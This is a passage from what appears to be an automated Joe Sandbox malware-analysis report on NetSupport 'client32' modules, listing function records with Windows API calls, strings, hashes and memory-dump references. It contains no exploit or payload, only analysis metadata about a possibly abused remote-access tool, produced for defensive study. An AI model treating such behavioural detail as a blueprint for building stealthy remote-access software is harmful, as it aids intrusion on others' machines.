                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _calloc
                                                                                  • String ID:
                                                                                  • API String ID: 1679841372-0
                                                                                  • Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                  • Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
                                                                                  • Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                  • Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
                                                                                  Function 6F9F8FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6F9F8FE4
                                                                                  • getsockname.WSOCK32(?,?,00000010,?,03022F58,?), ref: 6F9F9005
                                                                                  • WSAGetLastError.WSOCK32(?,?,00000010,?,03022F58,?), ref: 6F9F902E
                                                                                    • Part of subcall function 6F9F5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6F9F8F91,00000000,00000000,6FA3B8DA,?,00000080), ref: 6F9F5852
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                  • String ID:
                                                                                  • API String ID: 3066294524-0
                                                                                  • Opcode ID: d294a6fa08ef33e2d20bee3a148b99982e5086a0931526cf6e1d219508d4e3a5
                                                                                  • Instruction ID: 0e999d0f5e006711758ad831813cf479ade4458ef019902e6315835a34479b25
                                                                                  • Opcode Fuzzy Hash: d294a6fa08ef33e2d20bee3a148b99982e5086a0931526cf6e1d219508d4e3a5
                                                                                  • Instruction Fuzzy Hash: 81111C72A04218ABDB00DFA9DD01ABEB7FCEB49214F11456AEC05E7280E774AA558B91
                                                                                  Function 11112140 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                  • __wsplitpath.LIBCMT ref: 11112185
                                                                                    • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                  • String ID:
                                                                                  • API String ID: 1847508633-0
                                                                                  • Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                  • Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
                                                                                  • Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                  • Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5
                                                                                  Function 1109EE00 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                    • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                    • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                    • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                    • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,0094CB48,?,00000001,00000001), ref: 1109EDC3
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                  • String ID:
                                                                                  • API String ID: 2256153495-0
                                                                                  • Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                  • Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
                                                                                  • Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                  • Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50
                                                                                  Function 11069480 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: ??CTL32.DLL
                                                                                  • API String ID: 1029625771-2984404022
                                                                                  • Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                  • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                                  • Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                  • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                                  Function 6F9F5840 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • inet_ntoa.WSOCK32(00000080,?,00000000,?,6F9F8F91,00000000,00000000,6FA3B8DA,?,00000080), ref: 6F9F5852
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: inet_ntoa
                                                                                  • String ID: gfff
                                                                                  • API String ID: 1879540557-1553575800
                                                                                  • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                  • Instruction ID: f687cd01b052ef21384b8bf52a6c7c7622107d9b0f7fc169061e4e309e3be314
                                                                                  • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                  • Instruction Fuzzy Hash: E51178226092D78BC31A8A2EA8606D6BFDDDF96250B188569D9C9CB341D621E80BC7D1
                                                                                  Function 110271A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DriveType
                                                                                  • String ID: ?:\
                                                                                  • API String ID: 338552980-2533537817
                                                                                  • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                  • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                                  • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                  • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                                  Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                  • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                    • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                  Strings
                                                                                  • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenwvsprintf
                                                                                  • String ID: Error %d Opening regkey %s
                                                                                  • API String ID: 1772833024-3994271378
                                                                                  • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                  • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                  • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                  • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                  Function 110ED4E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                    • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                  Strings
                                                                                  • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Closewvsprintf
                                                                                  • String ID: Error %d closing regkey %x
                                                                                  • API String ID: 843752472-892920262
                                                                                  • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                  • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                                  • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                  • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                                  Function 11146FE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,0264B8B0,?,?,?,00000100,?,?,00000009), ref: 11146FF9
                                                                                    • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: HandleLibraryLoadModule
                                                                                  • String ID: NSMTRACE
                                                                                  • API String ID: 4133054770-4175627554
                                                                                  • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                  • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                                  • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                  • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                                  Function 110262C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: psapi.dll
                                                                                  • API String ID: 1029625771-80456845
                                                                                  • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                  • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                                  • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                  • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                                  Function 6F9F4F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,6F9F8DC8), ref: 6F9F4F78
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: psapi.dll
                                                                                  • API String ID: 1029625771-80456845
                                                                                  • Opcode ID: 24a20829d709380053b4af4aa97fdf324579931aab82e66f2f636079b6ea2ebc
